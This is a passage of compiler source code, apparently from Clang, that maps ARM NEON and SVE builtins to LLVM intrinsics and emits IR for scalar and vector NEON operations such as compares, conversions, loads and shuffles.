NEONMAP1(vqsubh_s16, aarch64_neon_sqsub, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqsubh_u16, aarch64_neon_uqsub, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqsubs_s32, aarch64_neon_sqsub, Add1ArgType),
NEONMAP1(vqsubs_u32, aarch64_neon_uqsub, Add1ArgType),
NEONMAP1(vrecped_f64, aarch64_neon_frecpe, Add1ArgType),
NEONMAP1(vrecpes_f32, aarch64_neon_frecpe, Add1ArgType),
NEONMAP1(vrecpxd_f64, aarch64_neon_frecpx, Add1ArgType),
NEONMAP1(vrecpxs_f32, aarch64_neon_frecpx, Add1ArgType),
NEONMAP1(vrshld_s64, aarch64_neon_srshl, Add1ArgType),
NEONMAP1(vrshld_u64, aarch64_neon_urshl, Add1ArgType),
NEONMAP1(vrsqrted_f64, aarch64_neon_frsqrte, Add1ArgType),
NEONMAP1(vrsqrtes_f32, aarch64_neon_frsqrte, Add1ArgType),
NEONMAP1(vrsqrtsd_f64, aarch64_neon_frsqrts, Add1ArgType),
NEONMAP1(vrsqrtss_f32, aarch64_neon_frsqrts, Add1ArgType),
NEONMAP1(vsha1cq_u32, aarch64_crypto_sha1c, 0),
NEONMAP1(vsha1h_u32, aarch64_crypto_sha1h, 0),
NEONMAP1(vsha1mq_u32, aarch64_crypto_sha1m, 0),
NEONMAP1(vsha1pq_u32, aarch64_crypto_sha1p, 0),
NEONMAP1(vshld_s64, aarch64_neon_sshl, Add1ArgType),
NEONMAP1(vshld_u64, aarch64_neon_ushl, Add1ArgType),
NEONMAP1(vslid_n_s64, aarch64_neon_vsli, Vectorize1ArgType),
NEONMAP1(vslid_n_u64, aarch64_neon_vsli, Vectorize1ArgType),
NEONMAP1(vsqaddb_u8, aarch64_neon_usqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vsqaddd_u64, aarch64_neon_usqadd, Add1ArgType),
NEONMAP1(vsqaddh_u16, aarch64_neon_usqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vsqadds_u32, aarch64_neon_usqadd, Add1ArgType),
NEONMAP1(vsrid_n_s64, aarch64_neon_vsri, Vectorize1ArgType),
NEONMAP1(vsrid_n_u64, aarch64_neon_vsri, Vectorize1ArgType),
NEONMAP1(vuqaddb_s8, aarch64_neon_suqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vuqaddd_s64, aarch64_neon_suqadd, Add1ArgType),
NEONMAP1(vuqaddh_s16, aarch64_neon_suqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vuqadds_s32, aarch64_neon_suqadd, Add1ArgType),
// FP16 scalar intrinsics go here.
NEONMAP1(vabdh_f16, aarch64_sisd_fabd, Add1ArgType),
NEONMAP1(vcvtah_s32_f16, aarch64_neon_fcvtas, AddRetType | Add1ArgType),
NEONMAP1(vcvtah_s64_f16, aarch64_neon_fcvtas, AddRetType | Add1ArgType),
NEONMAP1(vcvtah_u32_f16, aarch64_neon_fcvtau, AddRetType | Add1ArgType),
NEONMAP1(vcvtah_u64_f16, aarch64_neon_fcvtau, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_f16_s32, aarch64_neon_vcvtfxs2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_f16_s64, aarch64_neon_vcvtfxs2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_f16_u32, aarch64_neon_vcvtfxu2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_f16_u64, aarch64_neon_vcvtfxu2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_s32_f16, aarch64_neon_vcvtfp2fxs, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_s64_f16, aarch64_neon_vcvtfp2fxs, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_u32_f16, aarch64_neon_vcvtfp2fxu, AddRetType | Add1ArgType),
NEONMAP1(vcvth_n_u64_f16, aarch64_neon_vcvtfp2fxu, AddRetType | Add1ArgType),
NEONMAP1(vcvth_s32_f16, aarch64_neon_fcvtzs, AddRetType | Add1ArgType),
NEONMAP1(vcvth_s64_f16, aarch64_neon_fcvtzs, AddRetType | Add1ArgType),
NEONMAP1(vcvth_u32_f16, aarch64_neon_fcvtzu, AddRetType | Add1ArgType),
NEONMAP1(vcvth_u64_f16, aarch64_neon_fcvtzu, AddRetType | Add1ArgType),
NEONMAP1(vcvtmh_s32_f16, aarch64_neon_fcvtms, AddRetType | Add1ArgType),
NEONMAP1(vcvtmh_s64_f16, aarch64_neon_fcvtms, AddRetType | Add1ArgType),
NEONMAP1(vcvtmh_u32_f16, aarch64_neon_fcvtmu, AddRetType | Add1ArgType),
NEONMAP1(vcvtmh_u64_f16, aarch64_neon_fcvtmu, AddRetType | Add1ArgType),
NEONMAP1(vcvtnh_s32_f16, aarch64_neon_fcvtns, AddRetType | Add1ArgType),
NEONMAP1(vcvtnh_s64_f16, aarch64_neon_fcvtns, AddRetType | Add1ArgType),
NEONMAP1(vcvtnh_u32_f16, aarch64_neon_fcvtnu, AddRetType | Add1ArgType),
NEONMAP1(vcvtnh_u64_f16, aarch64_neon_fcvtnu, AddRetType | Add1ArgType),
NEONMAP1(vcvtph_s32_f16, aarch64_neon_fcvtps, AddRetType | Add1ArgType),
NEONMAP1(vcvtph_s64_f16, aarch64_neon_fcvtps, AddRetType | Add1ArgType),
NEONMAP1(vcvtph_u32_f16, aarch64_neon_fcvtpu, AddRetType | Add1ArgType),
NEONMAP1(vcvtph_u64_f16, aarch64_neon_fcvtpu, AddRetType | Add1ArgType),
NEONMAP1(vmulxh_f16, aarch64_neon_fmulx, Add1ArgType),
NEONMAP1(vrecpeh_f16, aarch64_neon_frecpe, Add1ArgType),
NEONMAP1(vrecpxh_f16, aarch64_neon_frecpx, Add1ArgType),
NEONMAP1(vrsqrteh_f16, aarch64_neon_frsqrte, Add1ArgType),
NEONMAP1(vrsqrtsh_f16, aarch64_neon_frsqrts, Add1ArgType),
};
#undef NEONMAP0
#undef NEONMAP1
#undef NEONMAP2
#define SVEMAP1(NameBase, LLVMIntrinsic, TypeModifier) \
{ \
#NameBase, SVE::BI__builtin_sve_##NameBase, Intrinsic::LLVMIntrinsic, 0, \
TypeModifier \
}
#define SVEMAP2(NameBase, TypeModifier) \
{ #NameBase, SVE::BI__builtin_sve_##NameBase, 0, 0, TypeModifier }
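// SVEMAP2 entries carry no LLVM intrinsic (the 0 in the third slot); such
// builtins are lowered by dedicated code rather than the generic mapping.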
static const ARMVectorIntrinsicInfo AArch64SVEIntrinsicMap[] = {
#define GET_SVE_LLVM_INTRINSIC_MAP
#include "clang/Basic/arm_sve_builtin_cg.inc"
#undef GET_SVE_LLVM_INTRINSIC_MAP
};
#undef SVEMAP1
#undef SVEMAP2
static bool NEONSIMDIntrinsicsProvenSorted = false;
static bool AArch64SIMDIntrinsicsProvenSorted = false;
static bool AArch64SISDIntrinsicsProvenSorted = false;
static bool AArch64SVEIntrinsicsProvenSorted = false;
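// Look up BuiltinID in IntrinsicMap by binary search. The maps above must be
// kept sorted by BuiltinID; in asserts builds this is verified once per map,
// with the result cached in the *ProvenSorted flags.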
static const ARMVectorIntrinsicInfo *
findARMVectorIntrinsicInMap(ArrayRef<ARMVectorIntrinsicInfo> IntrinsicMap,
unsigned BuiltinID, bool &MapProvenSorted) {
#ifndef NDEBUG
if (!MapProvenSorted) {
assert(llvm::is_sorted(IntrinsicMap));
MapProvenSorted = true;
}
#endif
const ARMVectorIntrinsicInfo *Builtin =
llvm::lower_bound(IntrinsicMap, BuiltinID);
if (Builtin != IntrinsicMap.end() && Builtin->BuiltinID == BuiltinID)
return Builtin;
return nullptr;
}
Function *CodeGenFunction::LookupNeonLLVMIntrinsic(unsigned IntrinsicID,
unsigned Modifier,
llvm::Type *ArgType,
const CallExpr *E) {
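// The TypeModifier flags describe which types participate in the intrinsic's
// overload: optionally the call's return type, then one or two copies of the
// argument type, vectorized if requested.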
int VectorSize = 0;
if (Modifier & Use64BitVectors)
VectorSize = 64;
else if (Modifier & Use128BitVectors)
VectorSize = 128;
// Return type.
SmallVector<llvm::Type *, 3> Tys;
if (Modifier & AddRetType) {
llvm::Type *Ty = ConvertType(E->getCallReturnType(getContext()));
if (Modifier & VectorizeRetType)
Ty = llvm::FixedVectorType::get(
Ty, VectorSize ? VectorSize / Ty->getPrimitiveSizeInBits() : 1);
Tys.push_back(Ty);
}
// Arguments.
if (Modifier & VectorizeArgTypes) {
int Elts = VectorSize ? VectorSize / ArgType->getPrimitiveSizeInBits() : 1;
ArgType = llvm::FixedVectorType::get(ArgType, Elts);
}
if (Modifier & (Add1ArgType | Add2ArgTypes))
Tys.push_back(ArgType);
if (Modifier & Add2ArgTypes)
Tys.push_back(ArgType);
if (Modifier & InventFloatType)
Tys.push_back(FloatTy);
return CGM.getIntrinsic(IntrinsicID, Tys);
}
static Value *EmitCommonNeonSISDBuiltinExpr(
CodeGenFunction &CGF, const ARMVectorIntrinsicInfo &SISDInfo,
SmallVectorImpl<Value *> &Ops, const CallExpr *E) {
unsigned BuiltinID = SISDInfo.BuiltinID;
unsigned Int = SISDInfo.LLVMIntrinsic;
unsigned Modifier = SISDInfo.TypeModifier;
const char *s = SISDInfo.NameHint;
switch (BuiltinID) {
case NEON::BI__builtin_neon_vcled_s64:
case NEON::BI__builtin_neon_vcled_u64:
case NEON::BI__builtin_neon_vcles_f32:
case NEON::BI__builtin_neon_vcled_f64:
case NEON::BI__builtin_neon_vcltd_s64:
case NEON::BI__builtin_neon_vcltd_u64:
case NEON::BI__builtin_neon_vclts_f32:
case NEON::BI__builtin_neon_vcltd_f64:
case NEON::BI__builtin_neon_vcales_f32:
case NEON::BI__builtin_neon_vcaled_f64:
case NEON::BI__builtin_neon_vcalts_f32:
case NEON::BI__builtin_neon_vcaltd_f64:
// Only one direction of comparison actually exists: cmle is really a cmge
// with swapped operands. The table gives us the right intrinsic, but we
// still need to do the swap.
std::swap(Ops[0], Ops[1]);
break;
}
assert(Int && "Generic code assumes a valid intrinsic");
// Determine the type(s) of this overloaded AArch64 intrinsic.
const Expr *Arg = E->getArg(0);
llvm::Type *ArgTy = CGF.ConvertType(Arg->getType());
Function *F = CGF.LookupNeonLLVMIntrinsic(Int, Modifier, ArgTy, E);
int j = 0;
ConstantInt *C0 = ConstantInt::get(CGF.SizeTy, 0);
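// Scalar builtins may map to vector intrinsics. Where the intrinsic expects
// a vector but the operand is scalar, insert the (possibly truncated) scalar
// into lane 0 of an undef vector of the expected type.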
for (Function::const_arg_iterator ai = F->arg_begin(), ae = F->arg_end();
ai != ae; ++ai, ++j) {
llvm::Type *ArgTy = ai->getType();
if (Ops[j]->getType()->getPrimitiveSizeInBits() ==
ArgTy->getPrimitiveSizeInBits())
continue;
assert(ArgTy->isVectorTy() && !Ops[j]->getType()->isVectorTy());
// The constant argument to an _n_ intrinsic always has Int32Ty, so truncate
// it before inserting.
Ops[j] = CGF.Builder.CreateTruncOrBitCast(
Ops[j], cast<llvm::VectorType>(ArgTy)->getElementType());
Ops[j] =
CGF.Builder.CreateInsertElement(UndefValue::get(ArgTy), Ops[j], C0);
}
Value *Result = CGF.EmitNeonCall(F, Ops, s);
llvm::Type *ResultType = CGF.ConvertType(E->getType());
if (ResultType->getPrimitiveSizeInBits().getFixedSize() <
Result->getType()->getPrimitiveSizeInBits().getFixedSize())
return CGF.Builder.CreateExtractElement(Result, C0);
return CGF.Builder.CreateBitCast(Result, ResultType, s);
}
Value *CodeGenFunction::EmitCommonNeonBuiltinExpr(
unsigned BuiltinID, unsigned LLVMIntrinsic, unsigned AltLLVMIntrinsic,
const char *NameHint, unsigned Modifier, const CallExpr *E,
SmallVectorImpl<llvm::Value *> &Ops, Address PtrOp0, Address PtrOp1,
llvm::Triple::ArchType Arch) {
// Get the last argument, which specifies the vector type.
const Expr *Arg = E->getArg(E->getNumArgs() - 1);
Optional<llvm::APSInt> NeonTypeConst =
Arg->getIntegerConstantExpr(getContext());
if (!NeonTypeConst)
return nullptr;
// Determine the type of this overloaded NEON intrinsic.
NeonTypeFlags Type(NeonTypeConst->getZExtValue());
bool Usgn = Type.isUnsigned();
bool Quad = Type.isQuad();
const bool HasLegalHalfType = getTarget().hasLegalHalfType();
const bool AllowBFloatArgsAndRet =
getTargetHooks().getABIInfo().allowBFloatArgsAndRet();
llvm::FixedVectorType *VTy =
GetNeonType(this, Type, HasLegalHalfType, false, AllowBFloatArgsAndRet);
llvm::Type *Ty = VTy;
if (!Ty)
return nullptr;
auto getAlignmentValue32 = [&](Address addr) -> Value* {
return Builder.getInt32(addr.getAlignment().getQuantity());
};
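// For UnsignedAlts entries, LLVMIntrinsic is the unsigned flavour and
// AltLLVMIntrinsic the signed one; pick based on the NEON type.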
unsigned Int = LLVMIntrinsic;
if ((Modifier & UnsignedAlts) && !Usgn)
Int = AltLLVMIntrinsic;
switch (BuiltinID) {
default: break;
case NEON::BI__builtin_neon_splat_lane_v:
case NEON::BI__builtin_neon_splat_laneq_v:
case NEON::BI__builtin_neon_splatq_lane_v:
case NEON::BI__builtin_neon_splatq_laneq_v: {
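// splatq_lane reads a 64-bit vector but produces a 128-bit result, so double
// the element count; splat_laneq is the reverse, so halve it.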
auto NumElements = VTy->getElementCount();
if (BuiltinID == NEON::BI__builtin_neon_splatq_lane_v)
NumElements = NumElements * 2;
if (BuiltinID == NEON::BI__builtin_neon_splat_laneq_v)
NumElements = NumElements.divideCoefficientBy(2);
Ops[0] = Builder.CreateBitCast(Ops[0], VTy);
return EmitNeonSplat(Ops[0], cast<ConstantInt>(Ops[1]), NumElements);
}
case NEON::BI__builtin_neon_vpadd_v:
case NEON::BI__builtin_neon_vpaddq_v:
// We don't allow fp/int overloading of intrinsics.
if (VTy->getElementType()->isFloatingPointTy() &&
Int == Intrinsic::aarch64_neon_addp)
Int = Intrinsic::aarch64_neon_faddp;
break;
case NEON::BI__builtin_neon_vabs_v:
case NEON::BI__builtin_neon_vabsq_v:
if (VTy->getElementType()->isFloatingPointTy())
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::fabs, Ty), Ops, "vabs");
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Ty), Ops, "vabs");
case NEON::BI__builtin_neon_vadd_v:
case NEON::BI__builtin_neon_vaddq_v: {
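// Only polynomial types take this generic path; polynomial addition over
// GF(2) is bitwise XOR, performed on the operands' common i8-vector form.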
llvm::Type *VTy = llvm::FixedVectorType::get(Int8Ty, Quad ? 16 : 8);
Ops[0] = Builder.CreateBitCast(Ops[0], VTy);
Ops[1] = Builder.CreateBitCast(Ops[1], VTy);
Ops[0] = Builder.CreateXor(Ops[0], Ops[1]);
return Builder.CreateBitCast(Ops[0], Ty);
}
case NEON::BI__builtin_neon_vaddhn_v: {
llvm::FixedVectorType *SrcTy =
llvm::FixedVectorType::getExtendedElementVectorType(VTy);
// %sum = add <4 x i32> %lhs, %rhs
Ops[0] = Builder.CreateBitCast(Ops[0], SrcTy);
Ops[1] = Builder.CreateBitCast(Ops[1], SrcTy);
Ops[0] = Builder.CreateAdd(Ops[0], Ops[1], "vaddhn");
// %high = lshr <4 x i32> %sum, <i32 16, i32 16, i32 16, i32 16>
Constant *ShiftAmt =
ConstantInt::get(SrcTy, SrcTy->getScalarSizeInBits() / 2);
Ops[0] = Builder.CreateLShr(Ops[0], ShiftAmt, "vaddhn");
// %res = trunc <4 x i32> %high to <4 x i16>
return Builder.CreateTrunc(Ops[0], VTy, "vaddhn");
}
case NEON::BI__builtin_neon_vcale_v:
case NEON::BI__builtin_neon_vcaleq_v:
case NEON::BI__builtin_neon_vcalt_v:
case NEON::BI__builtin_neon_vcaltq_v:
std::swap(Ops[0], Ops[1]);
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vcage_v:
case NEON::BI__builtin_neon_vcageq_v:
case NEON::BI__builtin_neon_vcagt_v:
case NEON::BI__builtin_neon_vcagtq_v: {
llvm::Type *Ty;
switch (VTy->getScalarSizeInBits()) {
default: llvm_unreachable("unexpected type");
case 32:
Ty = FloatTy;
break;
case 64:
Ty = DoubleTy;
break;
case 16:
Ty = HalfTy;
break;
}
auto *VecFlt = llvm::FixedVectorType::get(Ty, VTy->getNumElements());
llvm::Type *Tys[] = { VTy, VecFlt };
Function *F = CGM.getIntrinsic(LLVMIntrinsic, Tys);
return EmitNeonCall(F, Ops, NameHint);
}
case NEON::BI__builtin_neon_vceqz_v:
case NEON::BI__builtin_neon_vceqzq_v:
return EmitAArch64CompareBuiltinExpr(Ops[0], Ty, ICmpInst::FCMP_OEQ,
ICmpInst::ICMP_EQ, "vceqz");
case NEON::BI__builtin_neon_vcgez_v:
case NEON::BI__builtin_neon_vcgezq_v:
return EmitAArch64CompareBuiltinExpr(Ops[0], Ty, ICmpInst::FCMP_OGE,
ICmpInst::ICMP_SGE, "vcgez");
case NEON::BI__builtin_neon_vclez_v:
case NEON::BI__builtin_neon_vclezq_v:
return EmitAArch64CompareBuiltinExpr(Ops[0], Ty, ICmpInst::FCMP_OLE,
ICmpInst::ICMP_SLE, "vclez");
case NEON::BI__builtin_neon_vcgtz_v:
case NEON::BI__builtin_neon_vcgtzq_v:
return EmitAArch64CompareBuiltinExpr(Ops[0], Ty, ICmpInst::FCMP_OGT,
ICmpInst::ICMP_SGT, "vcgtz");
case NEON::BI__builtin_neon_vcltz_v:
case NEON::BI__builtin_neon_vcltzq_v:
return EmitAArch64CompareBuiltinExpr(Ops[0], Ty, ICmpInst::FCMP_OLT,
ICmpInst::ICMP_SLT, "vcltz");
case NEON::BI__builtin_neon_vclz_v:
case NEON::BI__builtin_neon_vclzq_v:
// We generate a target-independent intrinsic, which needs a second argument
// saying whether clz of zero is undefined; on ARM it isn't.
Ops.push_back(Builder.getInt1(getTarget().isCLZForZeroUndef()));
break;
case NEON::BI__builtin_neon_vcvt_f32_v:
case NEON::BI__builtin_neon_vcvtq_f32_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ty = GetNeonType(this, NeonTypeFlags(NeonTypeFlags::Float32, false, Quad),
HasLegalHalfType);
return Usgn ? Builder.CreateUIToFP(Ops[0], Ty, "vcvt")
: Builder.CreateSIToFP(Ops[0], Ty, "vcvt");
case NEON::BI__builtin_neon_vcvt_f16_v:
case NEON::BI__builtin_neon_vcvtq_f16_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ty = GetNeonType(this, NeonTypeFlags(NeonTypeFlags::Float16, false, Quad),
HasLegalHalfType);
return Usgn ? Builder.CreateUIToFP(Ops[0], Ty, "vcvt")
: Builder.CreateSIToFP(Ops[0], Ty, "vcvt");
case NEON::BI__builtin_neon_vcvt_n_f16_v:
case NEON::BI__builtin_neon_vcvt_n_f32_v:
case NEON::BI__builtin_neon_vcvt_n_f64_v:
case NEON::BI__builtin_neon_vcvtq_n_f16_v:
case NEON::BI__builtin_neon_vcvtq_n_f32_v:
case NEON::BI__builtin_neon_vcvtq_n_f64_v: {
llvm::Type *Tys[2] = { GetFloatNeonType(this, Type), Ty };
Int = Usgn ? LLVMIntrinsic : AltLLVMIntrinsic;
Function *F = CGM.getIntrinsic(Int, Tys);
return EmitNeonCall(F, Ops, "vcvt_n");
}
case NEON::BI__builtin_neon_vcvt_n_s16_v:
case NEON::BI__builtin_neon_vcvt_n_s32_v:
case NEON::BI__builtin_neon_vcvt_n_u16_v:
case NEON::BI__builtin_neon_vcvt_n_u32_v:
case NEON::BI__builtin_neon_vcvt_n_s64_v:
case NEON::BI__builtin_neon_vcvt_n_u64_v:
case NEON::BI__builtin_neon_vcvtq_n_s16_v:
case NEON::BI__builtin_neon_vcvtq_n_s32_v:
case NEON::BI__builtin_neon_vcvtq_n_u16_v:
case NEON::BI__builtin_neon_vcvtq_n_u32_v:
case NEON::BI__builtin_neon_vcvtq_n_s64_v:
case NEON::BI__builtin_neon_vcvtq_n_u64_v: {
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
Function *F = CGM.getIntrinsic(LLVMIntrinsic, Tys);
return EmitNeonCall(F, Ops, "vcvt_n");
}
case NEON::BI__builtin_neon_vcvt_s32_v:
case NEON::BI__builtin_neon_vcvt_u32_v:
case NEON::BI__builtin_neon_vcvt_s64_v:
case NEON::BI__builtin_neon_vcvt_u64_v:
case NEON::BI__builtin_neon_vcvt_s16_v:
case NEON::BI__builtin_neon_vcvt_u16_v:
case NEON::BI__builtin_neon_vcvtq_s32_v:
case NEON::BI__builtin_neon_vcvtq_u32_v:
case NEON::BI__builtin_neon_vcvtq_s64_v:
case NEON::BI__builtin_neon_vcvtq_u64_v:
case NEON::BI__builtin_neon_vcvtq_s16_v:
case NEON::BI__builtin_neon_vcvtq_u16_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], GetFloatNeonType(this, Type));
return Usgn ? Builder.CreateFPToUI(Ops[0], Ty, "vcvt")
: Builder.CreateFPToSI(Ops[0], Ty, "vcvt");
}
case NEON::BI__builtin_neon_vcvta_s16_v:
case NEON::BI__builtin_neon_vcvta_s32_v:
case NEON::BI__builtin_neon_vcvta_s64_v:
case NEON::BI__builtin_neon_vcvta_u16_v:
case NEON::BI__builtin_neon_vcvta_u32_v:
case NEON::BI__builtin_neon_vcvta_u64_v:
case NEON::BI__builtin_neon_vcvtaq_s16_v:
case NEON::BI__builtin_neon_vcvtaq_s32_v:
case NEON::BI__builtin_neon_vcvtaq_s64_v:
case NEON::BI__builtin_neon_vcvtaq_u16_v:
case NEON::BI__builtin_neon_vcvtaq_u32_v:
case NEON::BI__builtin_neon_vcvtaq_u64_v:
case NEON::BI__builtin_neon_vcvtn_s16_v:
case NEON::BI__builtin_neon_vcvtn_s32_v:
case NEON::BI__builtin_neon_vcvtn_s64_v:
case NEON::BI__builtin_neon_vcvtn_u16_v:
case NEON::BI__builtin_neon_vcvtn_u32_v:
case NEON::BI__builtin_neon_vcvtn_u64_v:
case NEON::BI__builtin_neon_vcvtnq_s16_v:
case NEON::BI__builtin_neon_vcvtnq_s32_v:
case NEON::BI__builtin_neon_vcvtnq_s64_v:
case NEON::BI__builtin_neon_vcvtnq_u16_v:
case NEON::BI__builtin_neon_vcvtnq_u32_v:
case NEON::BI__builtin_neon_vcvtnq_u64_v:
case NEON::BI__builtin_neon_vcvtp_s16_v:
case NEON::BI__builtin_neon_vcvtp_s32_v:
case NEON::BI__builtin_neon_vcvtp_s64_v:
case NEON::BI__builtin_neon_vcvtp_u16_v:
case NEON::BI__builtin_neon_vcvtp_u32_v:
case NEON::BI__builtin_neon_vcvtp_u64_v:
case NEON::BI__builtin_neon_vcvtpq_s16_v:
case NEON::BI__builtin_neon_vcvtpq_s32_v:
case NEON::BI__builtin_neon_vcvtpq_s64_v:
case NEON::BI__builtin_neon_vcvtpq_u16_v:
case NEON::BI__builtin_neon_vcvtpq_u32_v:
case NEON::BI__builtin_neon_vcvtpq_u64_v:
case NEON::BI__builtin_neon_vcvtm_s16_v:
case NEON::BI__builtin_neon_vcvtm_s32_v:
case NEON::BI__builtin_neon_vcvtm_s64_v:
case NEON::BI__builtin_neon_vcvtm_u16_v:
case NEON::BI__builtin_neon_vcvtm_u32_v:
case NEON::BI__builtin_neon_vcvtm_u64_v:
case NEON::BI__builtin_neon_vcvtmq_s16_v:
case NEON::BI__builtin_neon_vcvtmq_s32_v:
case NEON::BI__builtin_neon_vcvtmq_s64_v:
case NEON::BI__builtin_neon_vcvtmq_u16_v:
case NEON::BI__builtin_neon_vcvtmq_u32_v:
case NEON::BI__builtin_neon_vcvtmq_u64_v: {
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Tys), Ops, NameHint);
}
case NEON::BI__builtin_neon_vcvtx_f32_v: {
llvm::Type *Tys[2] = { VTy->getTruncatedElementVectorType(VTy), Ty };
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Tys), Ops, NameHint);
}
case NEON::BI__builtin_neon_vext_v:
case NEON::BI__builtin_neon_vextq_v: {
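// vext concatenates the two sources and extracts a full-width window
// starting at lane CV, which is exactly a shufflevector with indices
// CV, CV+1, ..., CV+N-1.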
int CV = cast<ConstantInt>(Ops[2])->getSExtValue();
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; ++i)
Indices.push_back(i+CV);
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
return Builder.CreateShuffleVector(Ops[0], Ops[1], Indices, "vext");
}
case NEON::BI__builtin_neon_vfma_v:
case NEON::BI__builtin_neon_vfmaq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
// NEON intrinsic puts accumulator first, unlike the LLVM fma.
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, Ty,
{Ops[1], Ops[2], Ops[0]});
}
case NEON::BI__builtin_neon_vld1_v:
case NEON::BI__builtin_neon_vld1q_v: {
llvm::Type *Tys[] = {Ty, Int8PtrTy};
Ops.push_back(getAlignmentValue32(PtrOp0));
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Tys), Ops, "vld1");
}
case NEON::BI__builtin_neon_vld1_x2_v:
case NEON::BI__builtin_neon_vld1q_x2_v:
case NEON::BI__builtin_neon_vld1_x3_v:
case NEON::BI__builtin_neon_vld1q_x3_v:
case NEON::BI__builtin_neon_vld1_x4_v:
case NEON::BI__builtin_neon_vld1q_x4_v: {
llvm::Type *PTy = llvm::PointerType::getUnqual(VTy->getElementType());
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(LLVMIntrinsic, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld1xN");
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld2_v:
case NEON::BI__builtin_neon_vld2q_v:
case NEON::BI__builtin_neon_vld3_v:
case NEON::BI__builtin_neon_vld3q_v:
case NEON::BI__builtin_neon_vld4_v:
case NEON::BI__builtin_neon_vld4q_v:
case NEON::BI__builtin_neon_vld2_dup_v:
case NEON::BI__builtin_neon_vld2q_dup_v:
case NEON::BI__builtin_neon_vld3_dup_v:
case NEON::BI__builtin_neon_vld3q_dup_v:
case NEON::BI__builtin_neon_vld4_dup_v:
case NEON::BI__builtin_neon_vld4q_dup_v: {
llvm::Type *Tys[] = {Ty, Int8PtrTy};
Function *F = CGM.getIntrinsic(LLVMIntrinsic, Tys);
Value *Align = getAlignmentValue32(PtrOp1);
Ops[1] = Builder.CreateCall(F, {Ops[1], Align}, NameHint);
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld1_dup_v:
case NEON::BI__builtin_neon_vld1q_dup_v: {
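// Load a single scalar, insert it into lane 0 of an undef vector, then
// splat that lane across all elements.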
Value *V = UndefValue::get(Ty);
Ty = llvm::PointerType::getUnqual(VTy->getElementType());
PtrOp0 = Builder.CreateBitCast(PtrOp0, Ty);
LoadInst *Ld = Builder.CreateLoad(PtrOp0);
llvm::Constant *CI = ConstantInt::get(SizeTy, 0);
Ops[0] = Builder.CreateInsertElement(V, Ld, CI);
return EmitNeonSplat(Ops[0], CI);
}
case NEON::BI__builtin_neon_vld2_lane_v:
case NEON::BI__builtin_neon_vld2q_lane_v:
case NEON::BI__builtin_neon_vld3_lane_v:
case NEON::BI__builtin_neon_vld3q_lane_v:
case NEON::BI__builtin_neon_vld4_lane_v:
case NEON::BI__builtin_neon_vld4q_lane_v: {
llvm::Type *Tys[] = {Ty, Int8PtrTy};
Function *F = CGM.getIntrinsic(LLVMIntrinsic, Tys);
for (unsigned I = 2; I < Ops.size() - 1; ++I)
Ops[I] = Builder.CreateBitCast(Ops[I], Ty);
Ops.push_back(getAlignmentValue32(PtrOp1));
Ops[1] = Builder.CreateCall(F, makeArrayRef(Ops).slice(1), NameHint);
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vmovl_v: {
llvm::FixedVectorType *DTy =
llvm::FixedVectorType::getTruncatedElementVectorType(VTy);
Ops[0] = Builder.CreateBitCast(Ops[0], DTy);
if (Usgn)
return Builder.CreateZExt(Ops[0], Ty, "vmovl");
return Builder.CreateSExt(Ops[0], Ty, "vmovl");
}
case NEON::BI__builtin_neon_vmovn_v: {
llvm::FixedVectorType *QTy =
llvm::FixedVectorType::getExtendedElementVectorType(VTy);
Ops[0] = Builder.CreateBitCast(Ops[0], QTy);
return Builder.CreateTrunc(Ops[0], Ty, "vmovn");
}
case NEON::BI__builtin_neon_vmull_v:
// FIXME: the integer vmull operations could be emitted in terms of pure
// LLVM IR (2 exts followed by a mul). Unfortunately LLVM has a habit of
// hoisting the exts outside loops. Until GlobalISel comes along and can see
// through such movement, this leads to bad CodeGen. So we need an intrinsic
// for now.
Int = Usgn ? Intrinsic::arm_neon_vmullu : Intrinsic::arm_neon_vmulls;
Int = Type.isPoly() ? (unsigned)Intrinsic::arm_neon_vmullp : Int;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmull");
case NEON::BI__builtin_neon_vpadal_v:
